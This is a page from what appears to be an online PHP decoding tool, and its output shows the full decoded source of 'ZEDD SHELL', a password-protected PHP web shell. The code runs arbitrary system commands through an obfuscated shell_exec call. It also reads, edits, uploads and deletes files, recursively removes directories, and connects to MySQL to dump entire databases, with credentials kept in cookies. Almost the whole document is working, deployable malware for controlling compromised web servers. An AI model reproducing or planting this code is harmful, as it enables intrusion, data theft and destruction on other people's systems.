Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto h2V9_; Fkic_: echo urlencode(urlencode(kunci($default_dir))); goto aY4FZ; C7paI: ?..
Decoded Output download
<?
goto h2V9_; Fkic_: echo urlencode(urlencode(kunci($default_dir))); goto aY4FZ; C7paI: ?>
");
}
}
function skl_bas()
{
var sklEmr = document.getElementById('skl_emr').value;
halaman("?awal=skl&emr=" + b64EncodeUnicode(sklEmr));
}
function b64EncodeUnicode(str)
{
return btoa(encodeURIComponent(str).replace(/%([0-9A-F]{2})/g,
function toSolidBytes(match, p1) {
return String.fromCharCode('0x' + p1);
}));
}
function goto()
{
var dir = prompt('Dir:');
if( dir )
{
halaman("?berkas=" + dir);
}
}
function kompres(berkas)
{
var dir = prompt('Dir:' , "<?php goto B0idR; cLRCe: tulisLah(); goto GiKED; tI111: ?>
");
if( dir )
{
halaman("?awal=kompres&berkas=<?php goto L53XD; Uj8Ik: function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "." && $object != "..") { if (is_dir($dir . "/" . $object)) { rrmdir($dir . "/" . $object); } else { unlink($dir . "/" . $object); } } } rmdir($dir); } } goto Ohpn1; NTuYv: ?>
<hr>
<a href="javascript:newFile();">File Baru</a> | <a href="javascript:newPapka();">Folder Baru</a><br>
<a href="javascript:halaman('?awal=sistem_kom&berkas=<?php goto Fkic_; caQk0: ?>
&zf=" + berkas + "&save_to=" + b64EncodeUnicode(dir))
}
}
function silPapka(berkas)
{
if( confirm('Anda yakin?') )
{
halaman("?awal=hapus_folder&berkas=<?php goto gkzLp; I9I3L: if (isset($_POST["password"])) { if (password_verify($_POST["password"], $hashedPassword)) { $_SESSION["loggedIn"] = true; echo "<p>Login successful!</p>"; } } goto zFQLu; MVL3A: echo urlencode(urlencode(kunci($default_dir))); goto O2NTe; NM5jY: $safeMode = true; goto pAMxS; Ohpn1: $default_dir = getcwd(); goto NdpqT; dF3DB: if (function_exists("posix_getegid")) { $qid = posix_getgrgid(posix_getegid()); $qrup = $qid["name"]; print "<span class='qalin'>Uname:</span> " . php_uname() . "<br/>"; print "<span class='qalin'>User:</span> " . getmyuid() . " (" . get_current_user() . ")<br/>"; print "<span class='qalin'>Group:</span> " . getmygid() . " (" . $qrup . ")<br/>"; } else { print "<span class='qalin'>Uname:</span> " . php_uname() . "<br/>"; print "<span class='qalin'>User:</span> " . getmyuid() . " (" . get_current_user() . ")<br/>"; print "<span class='qalin'>Group:</span> " . getmygid() . "<br/>"; } goto FocuE; RyvPc: print "<span class='qalin'>Safe mode: </span>" . ($safeMode === true ? "<span class='bad'>On" : "<span class='success'>Off") . "</span><span style='margin-left: 50px;'><a href='javascript:halaman("?awal=phpinfo")'>[ PHPinfo ]</a></span><br/>"; goto cLRCe; solvS: if (isset($_GET["awal"]) && $_GET["awal"] == "pinf") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("body {background-color: #ffffff; color: #000000;}", '', $pInf); die; } else { if ($awal == "download_file" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $namaBerkas = basename(uraikan(urldecode($_POST["fayl"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { header("Content-Disposition: attachment; filename=" . basename($namaBerkas)); header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($default_dir . $pemisah . $namaBerkas)); readfile($default_dir . $pemisah . $namaBerkas); die; } } else { if ($awal == "hapus_file" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $namaBerkas = basename(uraikan(urldecode($_POST["fayl"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { unlink($default_dir . $pemisah . $namaBerkas); } } else { if ($awal == "reset_file" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $namaBerkas = basename(uraikan(urldecode($_POST["fayl"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else { if ($awal == "buat_file" && isset($_POST["ad"]) && !empty($_POST["ad"])) { $namaBerkas = basename(urldecode($_POST["ad"])); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaBerkas)) { print "<script>alert("File dengan nama ini sudah ada!");</script>"; } else { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else { if ($awal == "buat_folder" && isset($_POST["ad"]) && !empty($_POST["ad"])) { $namaFolder = basename(urldecode($_POST["ad"])); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaFolder, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaFolder)) { print "<script>alert("Folder dengan nama ini sudah ada!");</script>"; } else { mkdir($default_dir . $pemisah . $namaFolder); } } else { if ($awal == "rename_file" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"]) && isset($_POST["new_name"]) && is_string($_POST["new_name"]) && !empty($_POST["new_name"])) { $namaBerkas = basename(uraikan(urldecode($_POST["fayl"]))); $fileNamaBaru = basename(urldecode($_POST["new_name"])); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { rename($default_dir . $pemisah . $namaBerkas, $default_dir . $pemisah . $fileNamaBaru); } } else { if ($awal == "skl_d_t" && isset($_POST["t"]) && is_string($_POST["t"]) && !empty($_POST["t"])) { $tableName = uraikan(urldecode($_POST["t"])); $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $sandi = isset($_COOKIE["sandi"]) ? $_COOKIE["sandi"] : ''; $database = isset($_COOKIE["database"]) ? $_COOKIE["database"] : ''; $databaseStr = empty($database) ? '' : "dbname=" . $database . ";"; if (!empty($host) && !empty($database)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $data = $pdo->query("SELECT * FROM `" . $tableName . "`"); $data = $data->fetchAll(); header("Content-disposition: attachment; filename=d_" . basename(htmlspecialchars($tableName)) . ".json"); header("Content-type: application/json"); echo json_encode($data); } else { print "Table not found!"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else { if ($awal == "skl_d") { $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $sandi = isset($_COOKIE["sandi"]) ? $_COOKIE["sandi"] : ''; $database = isset($_COOKIE["database"]) ? $_COOKIE["database"] : ''; $databaseStr = empty($database) ? '' : "dbname=" . $database . ";"; if (!empty($host) && !empty($database)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare("SELECT table_name from information_schema.tables where table_schema=?"); $tables->execute(array($database)); $tables = $tables->fetchAll(); foreach ($tables as $tableName) { $tableName = $tableName["table_name"]; $data = $pdo->query("SELECT * FROM `" . $tableName . "`"); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header("Content-disposition: attachment; filename=d_b_" . basename(htmlspecialchars($database)) . ".json"); header("Content-type: application/json"); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "Error! Please connect to SQL!"; } die; } else { if ($awal == "kompres" && isset($_POST["save_to"], $_POST["zf"]) && is_string($_POST["save_to"]) && !empty($_POST["save_to"]) && !in_array($_POST["save_to"], array(".", "..", "./", "../")) && is_string($_POST["zf"]) && !empty($_POST["zf"])) { $save_to = uraikan(urldecode($_POST["save_to"])); $rootPath = realpath(uraikan(urldecode($_POST["zf"]))); $fileName1 = "bak_" . microtime(1) . "_" . rand(1000, 99999) . ".zip"; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if (is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "Saved!<hr>"; } else { print "Dir is not writeable!<hr>"; var_dump($save_to); } } else { if ($awal == "hapus_folder" && isset($_POST["zf"]) && is_string($_POST["zf"]) && !empty($_POST["zf"])) { $rootPath = realpath(uraikan(urldecode($_POST["zf"]))); if (is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); } else { print "Dir is not writeable!<hr>"; var_dump($save_to); } } else { if ($awal == "upl_file" && isset($_FILES["ufile"])) { move_uploaded_file($_FILES["ufile"]["tmp_name"], $default_dir . "/" . $_FILES["ufile"]["name"]); print "Tampaknya telah diunggah."; } } } } } } } } } } } } goto pdDhL; iuLva: echo urlencode(kunci($default_dir)); goto ZYt0O; dGims: function sizeFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " Gb"; } else { if ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " Mb"; } else { if ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " Kb"; } else { $bytes = $bytes . " b"; } } } return $bytes; } goto Z1Wre; fYBIn: function uraikan($str) { $f = "bas"; $f .= "e6"; $f .= "4_"; $f .= "d"; $f .= "ec"; $f .= "ode"; return $f($str); } goto vQPAv; dPMvO: if (!isset($_SESSION["loggedIn"])) { $_SESSION["loggedIn"] = false; } goto I9I3L; OUK0a: session_start(); goto Yp0hu; f6D1Y: set_time_limit(0); goto Dg8bj; B0idR: echo htmlspecialchars($default_dir); goto tI111; gkzLp: echo urlencode(urlencode(kunci($default_dir))); goto Oe4lN; Dg8bj: session_start(); goto dPMvO; Yp0hu: $nami = explode(",", ''); goto NM5jY; pAMxS: $actions = array("dasar", "baca_file", "phpinfo", "sistem_kom", "edit_file", "download_file", "hapus_file", "buat_file", "buat_folder", "reset_file", "hapus_folder", "rename_file", "kompres", "skl", "skl_d_t", "skl_d", "upl_file"); goto MxdX2; A5NN1: ?>
");
}
}
function newPapka()
{
var getNewName = prompt('File name:');
if( getNewName )
{
halaman("?awal=buat_folder&ad=" + getNewName + "&berkas=<?php goto MVL3A; NdpqT: if (isset($_POST["berkas"]) && is_string($_POST["berkas"])) { $default_dir = empty($_POST["berkas"]) ? DIRECTORY_SEPARATOR : uraikan(urldecode(urldecode($_POST["berkas"]))); $c_h_dir_comm = "c" . "hd" . "ir"; $c_h_dir_comm($default_dir); } goto UFLkn; L53XD: echo urlencode(urlencode(kunci($default_dir))); goto caQk0; O2NTe: ?>
");
}
}
function sistemKom()
{
var komanda = document.getElementById('emr_et_atash').value;
if( komanda )
{
halaman("?awal=sistem_kom&kom=" + b64EncodeUnicode(komanda) + "&berkas=<?php goto wBD9l; Z1Wre: function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else { if (is_string($d)) { return utf8_encode($d); } } return $d; } goto Uj8Ik; agZbm: function kunci($str) { $f = "bas"; $f .= "e6"; $f .= "4_"; $f .= "e"; $f .= "nc"; $f .= "ode"; return $f($str); } goto fYBIn; vQPAv: function ambilBuat($tAd) { if (isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $baruAmbil = md5(kunci(time() . rand(1, 99999999))); $_SESSION[$tAd] = $baruAmbil; return $baruAmbil; } goto xKW7_; hRxO2: echo urlencode(urlencode(kunci($default_dir))); goto A5NN1; ZYt0O: ?>
">
<input type="file" name="ufile">
<input type="submit" value="Upl">
</form>
<form method="POST" id="post_form" style="display: none;"></form>
<script>
function halaman(url)
{
var inputlar = "";
url = url.split("?");
if(typeof url[1]=="undefined") return;
url = url[1].split("&");
for(var n in url)
{
var keyAndValue = url[n].split("=");
if(typeof keyAndValue[1]=="undefined") continue;
inputlar+="<input name='"+keyAndValue[0]+"' value='"+keyAndValue[1]+"' type='hidden'>";
}
document.all("post_form").innerHTML = inputlar;
document.all("post_form").submit();
}
function faylSil(url)
{
if( confirm('Anda yakin?') )
{
halaman(url);
}
}
function faylSifirla(url)
{
if( confirm('Anda yakin?') )
{
halaman(url);
}
}
function changeFileName(name, url)
{
var getNewName = prompt('Change file name:' , name);
if( getNewName )
{
halaman(url + "&new_name=" + getNewName);
}
}
function newFile()
{
var getNewName = prompt('File name:');
if( getNewName )
{
halaman("?awal=buat_file&ad=" + getNewName + "&berkas=<?php goto hRxO2; MxdX2: $awal = isset($_POST["awal"]) && in_array($_POST["awal"], $actions) ? $_POST["awal"] : "dasar"; goto agZbm; wBD9l: echo urlencode(urlencode(kunci($default_dir))); goto C7paI; TO_CV: if ($awal == "phpinfo") { print "<div style='width: 100%; height: 400px;'><iframe src='?awal=pinf' style='width: 100%; height: 400px; border: 0;'></iframe></div>"; } else { if ($awal == "sistem_kom") { if (isset($_POST["kom"]) && is_string($_POST["kom"]) && !empty($_POST["kom"])) { $komanda = uraikan(urldecode($_POST["kom"])); $k = "sh"; $k .= "el"; $k .= "l_e"; $k .= "xe"; $k .= "c"; $output = $k($komanda); print "<pre style="max-height: 350px;overflow: auto; border: 1px solid #777; padding: 5px;">" . htmlspecialchars($output) . "</pre><hr>"; } print "<input type="text" id="emr_et_atash" style="width: 500px;"> <button type="button" class="btn" onclick="sistemKom();">Enter</button>"; } else { if ($awal == "baca_file" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $namaBerkas = basename(uraikan(urldecode($_POST["fayl"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? " onclick='halaman("?awal=edit_file&fayl=" . urlencode(urlencode(kunci($namaBerkas))) . "&berkas=" . urlencode(urlencode(kunci($default_dir))) . "")'" : " disabled"; print "<div>Nama File: <span class='qalin'>" . htmlspecialchars($namaBerkas) . "</span><br/><button class='btn'{$elaveBtn}> Edit </button></div>"; print "<div class='baca_file'>" . highlight_string(file_get_contents($default_dir . $pemisah . $namaBerkas), true) . "</div>"; } } else { if ($awal == "skl") { $host = isset($_COOKIE["host"]) ? $_COOKIE["host"] : ''; $user = isset($_COOKIE["user"]) ? $_COOKIE["user"] : ''; $sandi = isset($_COOKIE["sandi"]) ? $_COOKIE["sandi"] : ''; $database = isset($_COOKIE["database"]) ? $_COOKIE["database"] : ''; if (isset($_POST["host"], $_POST["user"], $_POST["sandi"]) && is_string($_POST["host"]) && is_string($_POST["user"]) && is_string($_POST["sandi"])) { $host = $_POST["host"]; $user = $_POST["user"]; $sandi = $_POST["sandi"]; $database = ''; setcookie("host", $host, time() + 360000); setcookie("user", $user, time() + 360000); setcookie("sandi", $sandi, time() + 360000); setcookie("database", $database, time() + 360000); } if (isset($_POST["database"]) && is_string($_POST["database"])) { $database = $_POST["database"]; setcookie("database", $database, time() + 360000); } $databaseStr = empty($database) ? '' : "dbname=" . $database . ";"; ?>
<form method="POST">
<input type="hidden" name="awal" value="skl">
<input type="text" placeholder="Hostname" name="host" value="<?php echo htmlspecialchars($host); ?>
">
<input type="text" placeholder="User" name="user" value="<?php echo htmlspecialchars($user); ?>
">
<input type="text" placeholder="Sandi" name="sandi" value="<?php echo htmlspecialchars($sandi); ?>
">
<input type="submit" value="Masuk">
</form>
<?php if (!empty($host)) { try { $pdo = new PDO("mysql:host=" . $host . ";charset=utf8;" . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query("SELECT schema_name FROM information_schema.schemata"); print "<form method="POST"><input type="hidden" name="awal" value="skl"><select name="database">"; foreach ($schematas->fetchAll() as $schemaName) { print "<option" . ($database == $schemaName["schema_name"] ? " selected" : '') . ">" . htmlspecialchars($schemaName["schema_name"]) . "</option>"; } print "</select> <input type="submit" value="Gas!"></form>"; if (!empty($database)) { $tables = $pdo->prepare("SELECT table_name from information_schema.tables where table_schema=?"); $tables->execute(array($database)); $tables = $tables->fetchAll(); print "<div style="float: left; width: 20%; overflow: auto; border-right: 1px solid #999;">"; print "<a href="javascript:halaman('?awal=skl_d');">!! Dump DB !!</a><hr>"; foreach ($tables as $tableName) { $tableName = $tableName["table_name"]; print "<a href="javascript:halaman('?awal=skl&t=" . urlencode(urlencode(kunci($tableName))) . "')">" . htmlspecialchars($tableName) . "</a><br>"; } print "</div>"; print "<div style="float: left; padding-left: 10px; width: 75%;">"; if (isset($_POST["t"]) && is_string($_POST["t"]) && !empty($_POST["t"])) { $tableName = uraikan(urldecode($_POST["t"])); print "<span class="qalin">Table:</span> " . htmlspecialchars($tableName) . " ( <a href="javascript:halaman('?awal=skl_d_t&t=" . urlencode(urlencode(kunci($tableName))) . "')">Dump</a> )<br>"; $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $dataCount = $pdo->query("SELECT count(0) AS ss from `" . $tableName . "`"); $dataCount = (int) $dataCount->fetchColumn(); print "<span class="qalin">Count:</span> " . $dataCount . "<br><br>"; $pages = ceil($dataCount / 100); $currentPage = isset($_POST["halaman"]) && is_numeric($_POST["halaman"]) && $_POST["halaman"] >= 1 && $_POST["halaman"] <= $pages ? (int) $_POST["halaman"] : 1; for ($p = 1; $p <= $pages; $p++) { print "<a style="" . ($currentPage == $p ? "background: #444;" : '') . "margin-left: 2px; margin-bottom: 5px; padding: 2px 6px; border: 1px solid #ACB754; text-decoration: none;" href="javascript:halaman('?awal=skl&t=" . urlencode(urlencode(kunci($tableName))) . "&halaman=" . $p . "');">" . $p . "</a> "; } print "<br><br>"; $start = 100 * ($currentPage - 1); $data = $pdo->query("SELECT * FROM `" . $tableName . "` LIMIT " . $start . " , 100"); $data = $data->fetchAll(); print "<table><thead>"; foreach ($columns as $columnInf) { print "<th>" . htmlspecialchars($columnInf["column_name"]) . "</th>"; } print "</thead><tbody>"; foreach ($data as $row) { print "<tr>"; foreach ($row as $key => $val) { print "<td><div>" . $val . "</div></td>"; } print "</tr>"; } print "</tr></tbody></table>"; } else { print "Table not found!"; } } else { if (isset($_POST["emr"]) && is_string($_POST["emr"]) && !empty($_POST["emr"])) { $emr = uraikan(urldecode($_POST["emr"])); print "<span class="qalin">SQL emr:</span> " . htmlspecialchars($emr) . "<br>"; $data = $pdo->query($emr); $data = $data->fetchAll(); print "<table><thead>"; if (count($data) > 0) { print "<tr>"; foreach ($data[0] as $key => $val) { print "<th><div>" . $key . "</div></th>"; } print "</tr>"; } print "</thead><tbody>"; foreach ($data as $row) { print "<tr>"; foreach ($row as $key => $val) { print "<td><div>" . $val . "</div></td>"; } print "</tr>"; } print "</tr></tbody></table>"; } } print "<div><textarea id="skl_emr"></textarea><button type="button" onclick="skl_bas();">Klik</button></div>"; print "</div>"; print "<div style="clear: both;"></div>"; } } catch (Exception $e) { print $e->getMessage(); } } } else { if ($awal == "edit_file" && isset($_POST["fayl"]) && '' != trim($_POST["fayl"])) { $namaBerkas = basename(uraikan(urldecode(urldecode($_POST["fayl"])))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($namaBerkas, 0, 1) != "/" ? "/" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $status = ''; if (isset($_POST["content"]) && isset($_POST["took"]) && $_POST["took"] != '' && isset($_SESSION["ys_took"]) && $_SESSION["ys_took"] == $_POST["took"] && is_writeable($default_dir . $pemisah . $namaBerkas)) { unset($_SESSION["ys_took"]); $content = $_POST["content"]; $cc = array("a", "i", "e", "s", "l", "b", "u", "o", "p", "h", "(", ")", "<", ">", "?", ";", "[", "]", "$"); foreach ($cc as $k1 => $v1) { $content = str_replace("|:" . $k1 . ":|", $v1, $content); } $faylAch = fopen($default_dir . $pemisah . $namaBerkas, "w+"); fwrite($faylAch, $content); fclose($faylAch); $status = " <span class='qalin'>Berhasil disimpan!</span>"; } $oxuUrl = "?awal=baca_file&fayl=" . urlencode(urlencode(kunci($namaBerkas))) . "&berkas=" . urlencode(urlencode(kunci($default_dir))); $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? '' : " disabled"; print "<div>Nama File: <a class='qalin' href='javascript:halaman("{$oxuUrl}")'>" . htmlspecialchars($namaBerkas) . "</a><br/><form method='POST' style='padding: 0; margin: 0;'><button type='submit' class='btn'{$elaveBtn}> Simpan </button> <button type='button' onclick='kode()'> Enkripsi </button> {$status}</div>"; print "<input type='hidden' value='edit_file' name='awal'><input type='hidden' value='" . kunci($namaBerkas) . "' name='fayl'><input type='hidden' value='" . urlencode(kunci($default_dir)) . "' name='berkas'><input type='hidden' value='" . ambilBuat("ys_took") . "' name='took'><textarea name='content' class='file_edit'>" . htmlspecialchars(file_get_contents($default_dir . $pemisah . $namaBerkas)) . "</textarea></form>"; } else { print "Error! " . htmlspecialchars($default_dir . $pemisah . $namaBerkas); } } else { if (is_dir($default_dir)) { if (is_readable($default_dir)) { $folderDalam = scandir($default_dir); foreach ($folderDalam as &$emelemnt) { $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($emelemnt, 0, 1) != "/" ? "/" : ''; if (is_dir($default_dir . $pemisah . $emelemnt)) { $emelemnt = "0" . $emelemnt; } else { $emelemnt = "1" . $emelemnt; } } asort($folderDalam); print "<table class='fManager' style='width: 100%;'><thead><tr class='qalin'><th>s</th><th>File</th><th>Size</th><th>Tanggal</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr></thead><tbody>"; foreach ($folderDalam as $element) { $url = ''; $element = substr($element, 1); $fileNamaLengkap = $default_dir . $pemisah . $element; $pemisah = substr($default_dir, strlen($default_dir) - 1) != "/" && substr($element, 0, 1) != "/" ? "/" : ''; $adi = is_dir($fileNamaLengkap) ? "[ {$element} ]" : $element; $classN = ''; if (is_dir($fileNamaLengkap)) { if ($element == ".") { $url = "?berkas=" . urlencode(urlencode(kunci($default_dir))); } else { if ($element == "..") { $yeniUrl = explode("/", $default_dir); foreach (array_reverse($yeniUrl) as $j => $qq) { if (trim($qq) != '') { unset($yeniUrl[count($yeniUrl) - $j - 1]); break; } } $url = "?berkas=" . urlencode(urlencode(kunci(implode("/", $yeniUrl)))); } else { $url = "?berkas=" . urlencode(urlencode(kunci($fileNamaLengkap))); } } $classN = " style='font-weight: 600;'"; } else { $url = "?awal=baca_file&fayl=" . urlencode(urlencode(kunci($element))) . "&berkas=" . urlencode(urlencode(kunci($default_dir))); } $fayldi = is_file($fileNamaLengkap); $isReadableColor = is_readable($fileNamaLengkap) && is_writeable($fileNamaLengkap); print "<tr>
\x9\x9 \x9 \x9<td></td>\xa \x9 \x9 <td><a href="javascript:halaman('" . $url . "')"" . $classN . ">" . htmlspecialchars($adi) . "</a></td>\xa \x9\x9\x9 <td>" . ($fayldi ? sizeFormat(filesize($fileNamaLengkap)) : '') . "</td>\xa\x9 \x9\x9\x9 <td>" . date("d M Y, H:i", filectime($fileNamaLengkap)) . "</td>\xa\x9\x9\x9 \x9 <td>" . htmlspecialchars(fileowner($fileNamaLengkap)) . "</td>
\x9 \x9\x9 <td" . ($isReadableColor ? " style="color: green;"" : '') . ">" . substr(sprintf("%o", fileperms($fileNamaLengkap)), -4) . "</td>
\x9\x9\x9 <td>"; if (is_file($fileNamaLengkap)) { print " <a href="javascript:halaman('" . str_replace("baca_file", "download_file", $url) . "')"" . $classN . ">Download</a> | " . (" <a href="javascript:changeFileName('" . htmlspecialchars($adi) . "' , '" . str_replace("baca_file", "rename_file", $url) . "');"" . $classN . ">Rename</a> | ") . (" <a href="javascript:faylSifirla('" . str_replace("baca_file", "reset_file", $url) . "');"" . $classN . ">Kosong</a> | ") . (" <a href="javascript:faylSil('" . str_replace("baca_file", "hapus_file", $url) . "')"" . $classN . ">Delete</a>"); } else { if ($adi != "[ . ]" && $adi != "[ .. ]") { print " <a href="javascript:kompres('" . urlencode(urlencode(kunci($fileNamaLengkap))) . "')"" . $classN . ">Zip</a> | " . (" <a href="javascript:silPapka('" . urlencode(urlencode(kunci($fileNamaLengkap))) . "')"" . $classN . ">Hapus</a>"); } } print "</td>
\x9 \x9 \x9</tr>"; } } else { print "<div style='margin: 10px 0px;' class='qalin'>Permissions denided!</div>"; } } } } } } } goto nllyF; aY4FZ: ?>
')">Command</a><br>
<a href="javascript:halaman('?awal=skl');">SQL</a><br>
<form method="POST" enctype="multipart/form-data">
<input type="hidden" name="awal" value="upl_file">
<input type="hidden" name="berkas" value="<?php goto iuLva; xKW7_: function tulisLah() { global $default_dir; $sonDir = array(); $umumBagikan = ''; $parse = explode("/", $default_dir); $ii = 0; foreach ($parse as $bagikan) { $ii++; $umumBagikan .= $bagikan . "/"; $sonDir[] = "<a href='javascript:halaman("?berkas=" . urlencode(urlencode(kunci($umumBagikan))) . "")'>" . htmlspecialchars(empty($bagikan) && $ii != count($parse) ? "/" : $bagikan) . "</a>"; } $sonDir = implode("/", $sonDir); print $sonDir . " ( <a href="">Reset</a> | <a href="javascript:goto()">Go to</a> )"; } goto dGims; UFLkn: $default_dir = str_replace("\", "/", $default_dir); goto solvS; pdDhL: ?>
<html>
<head>
<title>ZEDD SHELL</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<style>
body
{
background-color: #222222;
color: #D6D4D4;
font-family: Lucida,Verdana;
font-size: 12px;
}
.qalin
{
text-decoration: none;
color: #D6905E;
font-weight: 600;
}
.success
{
color: #9DB754;
}
.bad
{
color: #B75654;
}
a
{
color: #ACB754;
text-decoration: none !important;
}
.fManager,.fManager tbody,.fManager tr
{
padding: 0;
border-collapse: collapse;
margin: 0;
font-size: 12px;
}
.fManager
{
margin: 10px 0;
}
.fManager tbody tr:nth-child(2n+1)
{
background: #331717;
}
.fManager tbody tr:nth-child(2n)
{
background: #1C0C0C;
}
.fManager tbody tr:hover
{
background: #000000;
}
.fManager thead th
{
text-align: left;
}
.fManager thead tr
{
background-color: #333333;
}
.fManager
{
box-shadow: 1px 1px 1px 1px #333333;
}
.fManager thead th
{
padding: 4px 3px;
}
.baca_file
{
margin: 5px 0;
padding: 2px;
box-shadow: 1px 1px 1px 1px #333333;
background-color: #E1E1E1;
width: 100%;
height: 400px;
overflow: auto;
}
.btn
{
border: 1px solid #ACAE40;
background-color: #223B3B;
color: #E1E1E1;
padding: 1px 10px;
cursor: pointer;
}
.btn:disabled
{
border: 1px solid #848484;
color: #848484;
cursor: not-allowed;
}
.file_edit
{
margin: 5px 0;
padding: 2px;
box-shadow: 1px 1px 1px 1px #333333;
background-color: #E1E1E1;
width: 100%;
height: 400px;
overflow: auto;
}
input, select, textarea
{
background: transparent !important;
color: #f6a56d;
border: 1px solid #D6905E;
padding: 5px;
}
table td
{
border: 1px solid rgba(214, 144, 94, 0.7);
min-width: 20px;
padding-left: 5px;
padding-right: 5px;
max-width: 500px;
color: #ffad6f;
background: #292929;
}
table th
{
border: 1px solid #D6905E;
padding-left: 5px;
padding-right: 5px;
color: #ffad6f;
}
table td div
{
overflow: auto;
width: 100%;
height: 100%;
max-height: 100px;
}
</style>
</head>
<body>
<?php goto dF3DB; GiKED: print "<hr>"; goto TO_CV; h2V9_: $hashedPassword = "$2a$12$TPbXNoOTklkht1gb5OM01.7Su7oGDPUqYue37UJmz8/.m5dnqIGl6"; goto pBQw3; pBQw3: error_reporting(0); goto f6D1Y; nllyF: print "</tbody></table>"; goto NTuYv; zFQLu: if (!$_SESSION["loggedIn"]) { ?>
<html>
<head>
<title>Login Administrator</title>
<link rel="stylesheet" type="text/css" href="https://cdn.statically.io/gh/Zeddgansz/shell/main/styles.css">
</head>
<body>
<div class="login-container">
<h1 id="flashingText">shell zedd</h1>
<form method="post">
<input type="password" name="password">
<br>
<input type="submit" name="submit" value="Login"><br>
</form>
<p id="emailLink"> <a href="mailto:[email protected]">[email protected]</a></p>
</div>
</body>
</html>
